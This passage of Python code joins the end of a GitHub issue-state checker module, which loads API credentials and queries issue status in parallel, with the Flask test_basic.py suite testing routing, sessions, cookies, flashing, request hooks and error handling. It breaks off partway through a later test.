        self.api_url = url.replace('github.com', 'api.github.com/repos')
        self.get_cred()

    def get_cred(self):
        """Load GitHub API credentials.

        Prefers the YAML credentials file next to this module; falls back
        to the GIT_USER_NAME / GIT_API_TOKEN environment variables when the
        file is absent, unreadable, or does not define them.
        """
        creds_folder_path = os.path.dirname(__file__)
        creds_file_path = os.path.join(creds_folder_path, CREDENTIALS_FILE)
        github_creds = {}
        try:
            with open(creds_file_path) as creds_file:
                creds = yaml.safe_load(creds_file)
            if creds is not None:
                github_creds = creds.get(self.NAME, {})
        except Exception as e:
            # Bug fix: the original only consulted the environment when the
            # file parsed to None; a missing or corrupt file left the
            # credentials empty. Any failure now falls through to env vars.
            logger.error('Load credentials from {} failed with error: {}'.format(creds_file_path, repr(e)))
        # ``or`` also guards against os.environ.get returning None.
        self.user = github_creds.get('user') or os.environ.get("GIT_USER_NAME", '')
        self.api_token = github_creds.get('api_token') or os.environ.get("GIT_API_TOKEN", '')

    def is_active(self):
        """Check if the issue is still active.

        If unable to get issue state, always consider it as active.

        Returns:
            bool: False if the issue is closed else True.
        """
        try:
            response = requests.get(self.api_url, auth=(self.user, self.api_token))
            response.raise_for_status()
            issue_data = response.json()
            if issue_data.get('state', '') == 'closed':
                logger.debug('Issue {} is closed'.format(self.url))
                labels = issue_data.get('labels', [])
                # Warn when the closed issue is flagged duplicate so the
                # parent issue can be tracked instead.
                if any(['name' in label and 'duplicate' in label['name'].lower() for label in labels]):
                    # Bug fix: the two string fragments concatenated as
                    # "...ignorethe test..."; a space was missing.
                    logger.warning('GitHub issue: {} looks like duplicate and was closed. Please re-check and ignore '
                                   'the test on the parent issue'.format(self.url))
                return False
        except Exception as e:
            logger.error('Get details for {} failed with: {}'.format(self.url, repr(e)))
        logger.debug('Issue {} is active. Or getting issue state failed, consider it as active anyway'.format(self.url))
        return True
def issue_checker_factory(url):
    """Create an issue checker based on the domain name in the issue URL.

    Args:
        url (str): Issue URL.

    Returns:
        obj: An instance of issue checker, or None when the URL is bad or
        the website is not supported.
    """
    matched = re.match('https?://([^/]+)', url)
    if matched and matched.groups():
        site = matched.groups()[0].lower()
        if 'github' in site:
            return GitHubIssueChecker(url)
        logger.error('Unknown issue website: {}'.format(site))
    logger.error('Creating issue checker failed. Bad issue url {}'.format(url))
    return None
def check_issues(issues):
    """Check state of the specified issues.

    Because issue state checking may involve sending HTTP requests, this
    function runs the checkers in parallel processes to speed things up.

    Args:
        issues (list of str): List of issue URLs.

    Returns:
        dict: Issue state check result. Key is issue URL, value is either
        True or False based on issue state.
    """
    checkers = [c for c in [issue_checker_factory(issue) for issue in issues] if c is not None]
    if not checkers:
        logger.error('No checker created for issues: {}'.format(issues))
        return {}

    manager = multiprocessing.Manager()
    check_results = manager.dict()
    check_procs = []

    # NOTE(review): _check_issue is a closure; under the 'spawn' start
    # method (Windows / recent macOS default) closures cannot be pickled —
    # confirm this only runs where 'fork' is the start method.
    def _check_issue(checker, results):
        # Runs in a child process; stores the result keyed by URL.
        results[checker.url] = checker.is_active()

    for checker in checkers:
        check_procs.append(multiprocessing.Process(target=_check_issue, args=(checker, check_results,)))
    for proc in check_procs:
        proc.start()
    for proc in check_procs:
        # Cap each join so one hung HTTP request cannot block forever.
        proc.join(timeout=60)

    # Bug fix: return a plain dict copy. The original returned the
    # DictProxy itself; once the local Manager is garbage collected its
    # server process exits and every later access to the proxy raises.
    return dict(check_results)
|
test_basic.py | # -*- coding: utf-8 -*-
"""
tests.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
import re
import time
import uuid
from datetime import datetime
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest, Forbidden, NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
from flask._compat import text_type
def test_options_work(app, client):
    """An automatic OPTIONS response lists every allowed method and has an empty body."""
    @app.route("/", methods=["GET", "POST"])
    def index():
        return "Hello World"
    rv = client.open("/", method="OPTIONS")
    assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
    assert rv.data == b""
def test_options_on_multiple_rules(app, client):
    """OPTIONS advertises the union of methods from all rules registered on one path."""
    @app.route("/", methods=["GET", "POST"])
    def index():
        return "Hello World"
    @app.route("/", methods=["PUT"])
    def index_put():
        return "Aha!"
    rv = client.open("/", method="OPTIONS")
    assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
def test_provide_automatic_options_attr():
    """The view function attribute ``provide_automatic_options`` toggles the automatic OPTIONS handler."""
    app = flask.Flask(__name__)
    def index():
        return "Hello World!"
    index.provide_automatic_options = False
    app.route("/")(index)
    rv = app.test_client().open("/", method="OPTIONS")
    assert rv.status_code == 405
    app = flask.Flask(__name__)
    def index2():
        return "Hello World!"
    index2.provide_automatic_options = True
    app.route("/", methods=["OPTIONS"])(index2)
    rv = app.test_client().open("/", method="OPTIONS")
    assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
    """``add_url_rule(..., provide_automatic_options=False)`` disables implicit OPTIONS but keeps HEAD."""
    def index():
        return flask.request.method
    def more():
        return flask.request.method
    app.add_url_rule("/", view_func=index, provide_automatic_options=False)
    app.add_url_rule(
        "/more",
        view_func=more,
        methods=["GET", "POST"],
        provide_automatic_options=False,
    )
    assert client.get("/").data == b"GET"
    rv = client.post("/")
    assert rv.status_code == 405
    assert sorted(rv.allow) == ["GET", "HEAD"]
    # Older versions of Werkzeug.test.Client don't have an options method
    if hasattr(client, "options"):
        rv = client.options("/")
    else:
        rv = client.open("/", method="OPTIONS")
    assert rv.status_code == 405
    rv = client.head("/")
    assert rv.status_code == 200
    assert not rv.data  # head truncates
    assert client.post("/more").data == b"POST"
    assert client.get("/more").data == b"GET"
    rv = client.delete("/more")
    assert rv.status_code == 405
    assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
    if hasattr(client, "options"):
        rv = client.options("/more")
    else:
        rv = client.open("/more", method="OPTIONS")
    assert rv.status_code == 405
def test_request_dispatching(app, client):
    """Routing honors declared methods, returns 405 with an Allow header otherwise, and HEAD truncates."""
    @app.route("/")
    def index():
        return flask.request.method
    @app.route("/more", methods=["GET", "POST"])
    def more():
        return flask.request.method
    assert client.get("/").data == b"GET"
    rv = client.post("/")
    assert rv.status_code == 405
    assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
    rv = client.head("/")
    assert rv.status_code == 200
    assert not rv.data  # head truncates
    assert client.post("/more").data == b"POST"
    assert client.get("/more").data == b"GET"
    rv = client.delete("/more")
    assert rv.status_code == 405
    assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
    """Passing a plain string (not an iterable of strings) as ``methods`` raises TypeError."""
    with pytest.raises(TypeError):
        @app.route("/", methods="GET POST")
        def index():
            return "Hey"
def test_url_mapping(app, client):
    """``add_url_rule`` maps endpoints; a non-uppercase 'options' method suppresses the automatic handler."""
    random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
    def index():
        return flask.request.method
    def more():
        return flask.request.method
    def options():
        return random_uuid4
    app.add_url_rule("/", "index", index)
    app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
    # Issue 1288: Test that automatic options are not added when non-uppercase 'options' in methods
    app.add_url_rule("/options", "options", options, methods=["options"])
    assert client.get("/").data == b"GET"
    rv = client.post("/")
    assert rv.status_code == 405
    assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
    rv = client.head("/")
    assert rv.status_code == 200
    assert not rv.data  # head truncates
    assert client.post("/more").data == b"POST"
    assert client.get("/more").data == b"GET"
    rv = client.delete("/more")
    assert rv.status_code == 405
    assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
    rv = client.open("/options", method="OPTIONS")
    assert rv.status_code == 200
    assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
    """Rules added directly to ``app.url_map`` dispatch via ``app.view_functions``."""
    from werkzeug.routing import Submount, Rule
    app.url_map.add(
        Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
    )
    def bar():
        return "bar"
    def index():
        return "index"
    app.view_functions["bar"] = bar
    app.view_functions["index"] = index
    assert client.get("/foo/").data == b"index"
    assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
    """``@app.endpoint`` attaches view functions to pre-registered url_map rules."""
    from werkzeug.routing import Submount, Rule
    app.url_map.add(
        Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
    )
    @app.endpoint("bar")
    def bar():
        return "bar"
    @app.endpoint("index")
    def index():
        return "index"
    assert client.get("/foo/").data == b"index"
    assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
    """Session reads set ``accessed`` only; writes set both ``accessed`` and ``modified``."""
    @app.route("/set", methods=["POST"])
    def set():
        assert not flask.session.accessed
        assert not flask.session.modified
        flask.session["value"] = flask.request.form["value"]
        assert flask.session.accessed
        assert flask.session.modified
        return "value set"
    @app.route("/get")
    def get():
        assert not flask.session.accessed
        assert not flask.session.modified
        v = flask.session.get("value", "None")
        assert flask.session.accessed
        assert not flask.session.modified
        return v
    assert client.post("/set", data={"value": "42"}).data == b"value set"
    assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
    """SERVER_NAME drives the session cookie's domain; httponly is on by default."""
    app.config.update(SERVER_NAME="example.com")
    @app.route("/")
    def index():
        flask.session["testing"] = 42
        return "Hello World"
    rv = client.get("/", "http://example.com/")
    assert "domain=.example.com" in rv.headers["set-cookie"].lower()
    assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
    """The port in SERVER_NAME is stripped from the session cookie domain."""
    app.config.update(SERVER_NAME="example.com:8080")
    @app.route("/")
    def index():
        flask.session["testing"] = 42
        return "Hello World"
    rv = client.get("/", "http://example.com:8080/")
    assert "domain=.example.com" in rv.headers["set-cookie"].lower()
    assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
    """APPLICATION_ROOT becomes the session cookie path alongside the SERVER_NAME domain."""
    app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
    @app.route("/")
    def index():
        flask.session["testing"] = 42
        return "Hello World"
    rv = client.get("/", "http://example.com:8080/foo")
    assert "domain=example.com" in rv.headers["set-cookie"].lower()
    assert "path=/foo" in rv.headers["set-cookie"].lower()
    assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
    """APPLICATION_ROOT (mirrored by SCRIPT_NAME middleware) sets the session cookie path."""
    class PrefixPathMiddleware(object):
        # WSGI middleware that forces SCRIPT_NAME to a fixed prefix.
        def __init__(self, app, prefix):
            self.app = app
            self.prefix = prefix
        def __call__(self, environ, start_response):
            environ["SCRIPT_NAME"] = self.prefix
            return self.app(environ, start_response)
    app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
    app.config.update(APPLICATION_ROOT="/bar")
    @app.route("/")
    def index():
        flask.session["testing"] = 42
        return "Hello World"
    rv = client.get("/", "http://example.com:8080/")
    assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
    """Explicit SESSION_COOKIE_* settings override values derived from SERVER_NAME/APPLICATION_ROOT."""
    app.config.update(
        SERVER_NAME="www.example.com:8080",
        APPLICATION_ROOT="/test",
        SESSION_COOKIE_DOMAIN=".example.com",
        SESSION_COOKIE_HTTPONLY=False,
        SESSION_COOKIE_SECURE=True,
        SESSION_COOKIE_SAMESITE="Lax",
        SESSION_COOKIE_PATH="/",
    )
    @app.route("/")
    def index():
        flask.session["testing"] = 42
        return "Hello World"
    rv = client.get("/", "http://www.example.com:8080/test/")
    cookie = rv.headers["set-cookie"].lower()
    assert "domain=.example.com" in cookie
    assert "path=/" in cookie
    assert "secure" in cookie
    assert "httponly" not in cookie
    assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
    """SESSION_COOKIE_SAMESITE validates its value and emits the matching cookie attribute."""
    @app.route("/")
    def index():
        flask.session["testing"] = 42
        return "Hello World"
    app.config.update(SESSION_COOKIE_SAMESITE="invalid")
    with pytest.raises(ValueError):
        client.get("/")
    app.config.update(SESSION_COOKIE_SAMESITE=None)
    rv = client.get("/")
    cookie = rv.headers["set-cookie"].lower()
    assert "samesite" not in cookie
    app.config.update(SESSION_COOKIE_SAMESITE="Strict")
    rv = client.get("/")
    cookie = rv.headers["set-cookie"].lower()
    assert "samesite=strict" in cookie
    app.config.update(SESSION_COOKIE_SAMESITE="Lax")
    rv = client.get("/")
    cookie = rv.headers["set-cookie"].lower()
    assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
    """A 'localhost' SERVER_NAME yields no cookie domain and a UserWarning."""
    app.config.update(SERVER_NAME="localhost:5000")
    @app.route("/")
    def index():
        flask.session["testing"] = 42
        return "testing"
    rv = client.get("/", "http://localhost:5000/")
    assert "domain" not in rv.headers["set-cookie"].lower()
    w = recwarn.pop(UserWarning)
    assert '"localhost" is not a valid cookie domain' in str(w.message)
def test_session_ip_warning(recwarn, app, client):
    """An IP-address SERVER_NAME is used as the cookie domain but triggers a UserWarning."""
    app.config.update(SERVER_NAME="127.0.0.1:5000")
    @app.route("/")
    def index():
        flask.session["testing"] = 42
        return "testing"
    rv = client.get("/", "http://127.0.0.1:5000/")
    assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
    w = recwarn.pop(UserWarning)
    assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
    """Without a secret key, session reads return None but writes raise a helpful RuntimeError."""
    app.secret_key = None
    def expect_exception(f, *args, **kwargs):
        e = pytest.raises(RuntimeError, f, *args, **kwargs)
        assert e.value.args and "session is unavailable" in e.value.args[0]
    with app.test_request_context():
        assert flask.session.get("missing_key") is None
        expect_exception(flask.session.__setitem__, "foo", 42)
        expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
    """Permanent sessions carry an Expires attribute tied to permanent_session_lifetime; non-permanent ones don't."""
    permanent = True
    @app.route("/")
    def index():
        flask.session["test"] = 42
        flask.session.permanent = permanent
        return ""
    @app.route("/test")
    def test():
        return text_type(flask.session.permanent)
    rv = client.get("/")
    assert "set-cookie" in rv.headers
    match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
    # NOTE(review): match.group() includes the leading "expires="; werkzeug's
    # parse_date appears to tolerate the extra comma-terminated token — confirm.
    expires = parse_date(match.group())
    expected = datetime.utcnow() + app.permanent_session_lifetime
    assert expires.year == expected.year
    assert expires.month == expected.month
    assert expires.day == expected.day
    rv = client.get("/test")
    assert rv.data == b"True"
    permanent = False
    rv = client.get("/")
    assert "set-cookie" in rv.headers
    match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
    assert match is None
def test_session_stored_last(app, client):
    """Session changes made inside after_request handlers are still persisted (saved after they run)."""
    @app.after_request
    def modify_session(response):
        flask.session["foo"] = 42
        return response
    @app.route("/")
    def dump_session_contents():
        return repr(flask.session.get("foo"))
    assert client.get("/").data == b"None"
    assert client.get("/").data == b"42"
def test_session_special_types(app, client):
    """Tuples, bytes, Markup, UUID, datetime, and tag-lookalike dict keys round-trip through the session serializer."""
    now = datetime.utcnow().replace(microsecond=0)
    the_uuid = uuid.uuid4()
    @app.route("/")
    def dump_session_contents():
        flask.session["t"] = (1, 2, 3)
        flask.session["b"] = b"\xff"
        flask.session["m"] = flask.Markup("<html>")
        flask.session["u"] = the_uuid
        flask.session["d"] = now
        flask.session["t_tag"] = {" t": "not-a-tuple"}
        flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
        flask.session["di_tag"] = {" di": "not-a-dict"}
        return "", 204
    with client:
        client.get("/")
        s = flask.session
        assert s["t"] == (1, 2, 3)
        assert type(s["b"]) == bytes
        assert s["b"] == b"\xff"
        assert type(s["m"]) == flask.Markup
        assert s["m"] == flask.Markup("<html>")
        assert s["u"] == the_uuid
        assert s["d"] == now
        assert s["t_tag"] == {" t": "not-a-tuple"}
        assert s["di_t_tag"] == {" t__": "not-a-tuple"}
        assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
    """Set-Cookie is emitted only for permanent sessions with SESSION_REFRESH_EACH_REQUEST enabled (when unmodified)."""
    is_permanent = True
    @app.route("/bump")
    def bump():
        rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
        # The closure reads is_permanent at call time, so reassigning it
        # below switches behavior between run_test invocations.
        flask.session.permanent = is_permanent
        return str(rv)
    @app.route("/read")
    def read():
        return str(flask.session.get("foo", 0))
    def run_test(expect_header):
        with app.test_client() as c:
            assert c.get("/bump").data == b"1"
            assert c.get("/bump").data == b"2"
            assert c.get("/bump").data == b"3"
            rv = c.get("/read")
            set_cookie = rv.headers.get("set-cookie")
            assert (set_cookie is not None) == expect_header
            assert rv.data == b"3"
    is_permanent = True
    app.config["SESSION_REFRESH_EACH_REQUEST"] = True
    run_test(expect_header=True)
    is_permanent = True
    app.config["SESSION_REFRESH_EACH_REQUEST"] = False
    run_test(expect_header=False)
    is_permanent = False
    app.config["SESSION_REFRESH_EACH_REQUEST"] = True
    run_test(expect_header=False)
    is_permanent = False
    app.config["SESSION_REFRESH_EACH_REQUEST"] = False
    run_test(expect_header=False)
def test_session_vary_cookie(app, client):
    """Any session access adds exactly one ``Vary: Cookie`` header, merged with pre-existing Vary values."""
    @app.route("/set")
    def set_session():
        flask.session["test"] = "test"
        return ""
    @app.route("/get")
    def get():
        return flask.session.get("test")
    @app.route("/getitem")
    def getitem():
        return flask.session["test"]
    @app.route("/setdefault")
    def setdefault():
        return flask.session.setdefault("test", "default")
    @app.route("/vary-cookie-header-set")
    def vary_cookie_header_set():
        response = flask.Response()
        response.vary.add("Cookie")
        flask.session["test"] = "test"
        return response
    @app.route("/vary-header-set")
    def vary_header_set():
        response = flask.Response()
        response.vary.update(("Accept-Encoding", "Accept-Language"))
        flask.session["test"] = "test"
        return response
    @app.route("/no-vary-header")
    def no_vary_header():
        return ""
    def expect(path, header_value="Cookie"):
        rv = client.get(path)
        if header_value:
            # The 'Vary' key should exist in the headers only once.
            assert len(rv.headers.get_all("Vary")) == 1
            assert rv.headers["Vary"] == header_value
        else:
            assert "Vary" not in rv.headers
    expect("/set")
    expect("/get")
    expect("/getitem")
    expect("/setdefault")
    expect("/vary-cookie-header-set")
    expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
    expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
    """``flash()`` marks the session modified and queues messages in order."""
    assert not flask.session.modified
    flask.flash("Zap")
    flask.session.modified = False
    flask.flash("Zip")
    assert flask.session.modified
    assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
    """``get_flashed_messages`` supports categories and category filtering; messages clear once consumed."""
    # Be sure app.testing=True below, else tests can fail silently.
    #
    # Specifically, if app.testing is not set to True, the AssertionErrors
    # in the view functions will cause a 500 response to the test client
    # instead of propagating exceptions.
    @app.route("/")
    def index():
        flask.flash(u"Hello World")
        flask.flash(u"Hello World", "error")
        flask.flash(flask.Markup(u"<em>Testing</em>"), "warning")
        return ""
    @app.route("/test/")
    def test():
        messages = flask.get_flashed_messages()
        assert list(messages) == [
            u"Hello World",
            u"Hello World",
            flask.Markup(u"<em>Testing</em>"),
        ]
        return ""
    @app.route("/test_with_categories/")
    def test_with_categories():
        messages = flask.get_flashed_messages(with_categories=True)
        assert len(messages) == 3
        assert list(messages) == [
            ("message", u"Hello World"),
            ("error", u"Hello World"),
            ("warning", flask.Markup(u"<em>Testing</em>")),
        ]
        return ""
    @app.route("/test_filter/")
    def test_filter():
        messages = flask.get_flashed_messages(
            category_filter=["message"], with_categories=True
        )
        assert list(messages) == [("message", u"Hello World")]
        return ""
    @app.route("/test_filters/")
    def test_filters():
        messages = flask.get_flashed_messages(
            category_filter=["message", "warning"], with_categories=True
        )
        assert list(messages) == [
            ("message", u"Hello World"),
            ("warning", flask.Markup(u"<em>Testing</em>")),
        ]
        return ""
    @app.route("/test_filters_without_returning_categories/")
    def test_filters2():
        messages = flask.get_flashed_messages(category_filter=["message", "warning"])
        assert len(messages) == 2
        assert messages[0] == u"Hello World"
        assert messages[1] == flask.Markup(u"<em>Testing</em>")
        return ""
    # Create new test client on each test to clean flashed messages.
    client = app.test_client()
    client.get("/")
    client.get("/test_with_categories/")
    client = app.test_client()
    client.get("/")
    client.get("/test_filter/")
    client = app.test_client()
    client.get("/")
    client.get("/test_filters/")
    client = app.test_client()
    client.get("/")
    client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
    """before_request runs before the view; after_request can rewrite the response body."""
    evts = []
    @app.before_request
    def before_request():
        evts.append("before")
    @app.after_request
    def after_request(response):
        response.data += b"|after"
        evts.append("after")
        return response
    @app.route("/")
    def index():
        assert "before" in evts
        assert "after" not in evts
        return "request"
    assert "after" not in evts
    rv = client.get("/").data
    assert "after" in evts
    assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
    """The first before_request hook returning a value short-circuits later hooks and the view."""
    evts = []
    @app.before_request
    def before_request1():
        evts.append(1)
    @app.before_request
    def before_request2():
        evts.append(2)
        return "hello"
    @app.before_request
    def before_request3():
        evts.append(3)
        return "bye"
    @app.route("/")
    def index():
        evts.append("index")
        return "damnit"
    rv = client.get("/").data.strip()
    assert rv == b"hello"
    assert evts == [1, 2]
def test_after_request_processing(app, client):
    """``after_this_request`` registers a one-off response hook inside a view."""
    @app.route("/")
    def index():
        @flask.after_this_request
        def foo(response):
            response.headers["X-Foo"] = "a header"
            return response
        return "Test"
    resp = client.get("/")
    assert resp.status_code == 200
    assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
    """teardown_request hooks run exactly once and their return value is ignored."""
    called = []
    @app.teardown_request
    def teardown_request(exc):
        called.append(True)
        return "Ignored"
    @app.route("/")
    def root():
        return "Response"
    rv = client.get("/")
    assert rv.status_code == 200
    assert b"Response" in rv.data
    assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
    """Same teardown behavior as the non-debug case.

    NOTE(review): despite the name, ``app.debug`` is never enabled here —
    presumably the ``app`` fixture or history covers it; confirm.
    """
    called = []
    @app.teardown_request
    def teardown_request(exc):
        called.append(True)
        return "Ignored"
    @app.route("/")
    def root():
        return "Response"
    rv = client.get("/")
    assert rv.status_code == 200
    assert b"Response" in rv.data
    assert len(called) == 1
def test_teardown_request_handler_error(app, client):
    """All teardown_request hooks receive the same original exception, even if a later error clobbers sys.exc_info()."""
    called = []
    app.testing = False
    @app.teardown_request
    def teardown_request1(exc):
        assert type(exc) == ZeroDivisionError
        called.append(True)
        # This raises a new error and blows away sys.exc_info(), so we can
        # test that all teardown_requests get passed the same original
        # exception.
        try:
            raise TypeError()
        except:
            pass
    @app.teardown_request
    def teardown_request2(exc):
        assert type(exc) == ZeroDivisionError
        called.append(True)
        # This raises a new error and blows away sys.exc_info(), so we can
        # test that all teardown_requests get passed the same original
        # exception.
        try:
            raise TypeError()
        except:
            pass
    @app.route("/")
    def fails():
        1 // 0
    rv = client.get("/")
    assert rv.status_code == 500
    assert b"Internal Server Error" in rv.data
    assert len(called) == 2
def test_before_after_request_order(app, client):
    """before_request hooks run in registration order; after_request and teardown hooks run in reverse order."""
    called = []
    @app.before_request
    def before1():
        called.append(1)
    @app.before_request
    def before2():
        called.append(2)
    @app.after_request
    def after1(response):
        called.append(4)
        return response
    @app.after_request
    def after2(response):
        called.append(3)
        return response
    @app.teardown_request
    def finish1(exc):
        called.append(6)
    @app.teardown_request
    def finish2(exc):
        called.append(5)
    @app.route("/")
    def index():
        return "42"
    rv = client.get("/")
    assert rv.data == b"42"
    assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
    """Error handlers can be keyed by status code or by HTTPException class."""
    app.testing = False
    @app.errorhandler(404)
    def not_found(e):
        return "not found", 404
    @app.errorhandler(500)
    def internal_server_error(e):
        return "internal server error", 500
    @app.errorhandler(Forbidden)
    def forbidden(e):
        return "forbidden", 403
    @app.route("/")
    def index():
        flask.abort(404)
    @app.route("/error")
    def error():
        1 // 0
    @app.route("/forbidden")
    def error2():
        flask.abort(403)
    rv = client.get("/")
    assert rv.status_code == 404
    assert rv.data == b"not found"
    rv = client.get("/error")
    assert rv.status_code == 500
    assert b"internal server error" == rv.data
    rv = client.get("/forbidden")
    assert rv.status_code == 403
    assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
    """Registering a handler for a non-standard status code raises KeyError."""
    with pytest.raises(KeyError) as exc_info:
        app.register_error_handler(999, lambda e: ("999", 999))
    assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
    """after_request hooks still post-process responses produced by error handlers."""
    app.testing = False
    @app.errorhandler(500)
    def internal_server_error(e):
        return "internal server error", 500
    @app.route("/")
    def broken_func():
        1 // 0
    @app.after_request
    def after_request(resp):
        resp.mimetype = "text/x-special"
        return resp
    resp = client.get("/")
    assert resp.mimetype == "text/x-special"
    assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
    """BaseExceptions propagate out of the test client; the request context is preserved with the exception."""
    app.testing = False
    @app.route("/")
    def broken_func():
        raise KeyboardInterrupt()
    with pytest.raises(KeyboardInterrupt):
        client.get("/")
    ctx = flask._request_ctx_stack.top
    assert ctx.preserved
    assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
    """before_request runs even when routing 404s, so error handlers can read flask.g."""
    @app.before_request
    def attach_something():
        flask.g.something = "value"
    @app.errorhandler(404)
    def return_something(error):
        return flask.g.something, 404
    rv = client.get("/")
    assert rv.status_code == 404
    assert rv.data == b"value"
def test_user_error_handling(app, client):
    """Handlers registered for custom exception classes receive the raised instance."""
    class MyException(Exception):
        pass
    @app.errorhandler(MyException)
    def handle_my_exception(e):
        assert isinstance(e, MyException)
        return "42"
    @app.route("/")
    def index():
        raise MyException()
    assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
    """A handler for an HTTPException subclass beats the parent status-code
    handler; the status-code handler still serves the plain parent exception.
    """
    class ForbiddenSubclass(Forbidden):
        pass
    @app.errorhandler(ForbiddenSubclass)
    def handle_forbidden_subclass(e):
        assert isinstance(e, ForbiddenSubclass)
        return "banana"
    # Fix: this handler was also named ``handle_forbidden_subclass``,
    # shadowing the function above (flake8 F811). Registration happens at
    # decoration time, so the rename does not change behavior.
    @app.errorhandler(403)
    def handle_forbidden(e):
        assert not isinstance(e, ForbiddenSubclass)
        assert isinstance(e, Forbidden)
        return "apple"
    @app.route("/1")
    def index1():
        raise ForbiddenSubclass()
    @app.route("/2")
    def index2():
        flask.abort(403)
    @app.route("/3")
    def index3():
        raise Forbidden()
    assert client.get("/1").data == b"banana"
    assert client.get("/2").data == b"apple"
    assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
    """The most specific registered exception class wins (E2 beats Exception for E3 via MRO)."""
    class E1(Exception):
        pass
    class E2(Exception):
        pass
    class E3(E1, E2):
        pass
    @app.errorhandler(E2)
    def handle_e2(e):
        return "E2"
    @app.errorhandler(Exception)
    def handle_exception(e):
        return "Exception"
    @app.route("/E1")
    def raise_e1():
        raise E1
    @app.route("/E3")
    def raise_e3():
        raise E3
    rv = client.get("/E1")
    assert rv.data == b"Exception"
    rv = client.get("/E3")
    assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
    """Missing form keys become 400s normally; debug mode or TRAP_BAD_REQUEST_ERRORS re-raises them."""
    @app.route("/key")
    def fail():
        flask.request.form["missing_key"]
    @app.route("/abort")
    def allow_abort():
        flask.abort(400)
    rv = client.get("/key")
    assert rv.status_code == 400
    assert b"missing_key" not in rv.data
    rv = client.get("/abort")
    assert rv.status_code == 400
    app.debug = True
    with pytest.raises(KeyError) as e:
        client.get("/key")
    assert e.errisinstance(BadRequest)
    assert "missing_key" in e.value.get_description()
    rv = client.get("/abort")
    assert rv.status_code == 400
    app.debug = False
    app.config["TRAP_BAD_REQUEST_ERRORS"] = True
    with pytest.raises(KeyError):
        client.get("/key")
    with pytest.raises(BadRequest):
        client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
    """With TRAP_HTTP_EXCEPTIONS, aborts propagate as exceptions instead of becoming responses."""
    app.config["TRAP_HTTP_EXCEPTIONS"] = True
    @app.route("/fail")
    def fail():
        flask.abort(404)
    with pytest.raises(NotFound):
        client.get("/fail")
def test_error_handler_after_processor_error(app, client):
    """Errors raised in before_request or after_request hooks still reach the 500 error handler."""
    app.testing = False
    # ``trigger`` is a closure over the loop variable assigned at the bottom.
    @app.before_request
    def before_request():
        if trigger == "before":
            1 // 0
    @app.after_request
    def after_request(response):
        if trigger == "after":
            1 // 0
        return response
    @app.route("/")
    def index():
        return "Foo"
    @app.errorhandler(500)
    def internal_server_error(e):
        return "Hello Server Error", 500
    for trigger in "before", "after":
        rv = client.get("/")
        assert rv.status_code == 500
        assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
    """In debug mode, a file-field lookup on a non-multipart POST raises DebugFilesKeyError with a helpful message."""
    from flask.debughelpers import DebugFilesKeyError
    app.debug = True
    @app.route("/fail", methods=["POST"])
    def index():
        return flask.request.files["foo"].filename
    # with statement is important because we leave an exception on the
    # stack otherwise and we want to ensure that this is not the case
    # to not negatively affect other tests.
    with client:
        with pytest.raises(DebugFilesKeyError) as e:
            client.post("/fail", data={"foo": "index.txt"})
    assert "no file contents were transmitted" in str(e.value)
    assert 'This was submitted: "index.txt"' in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
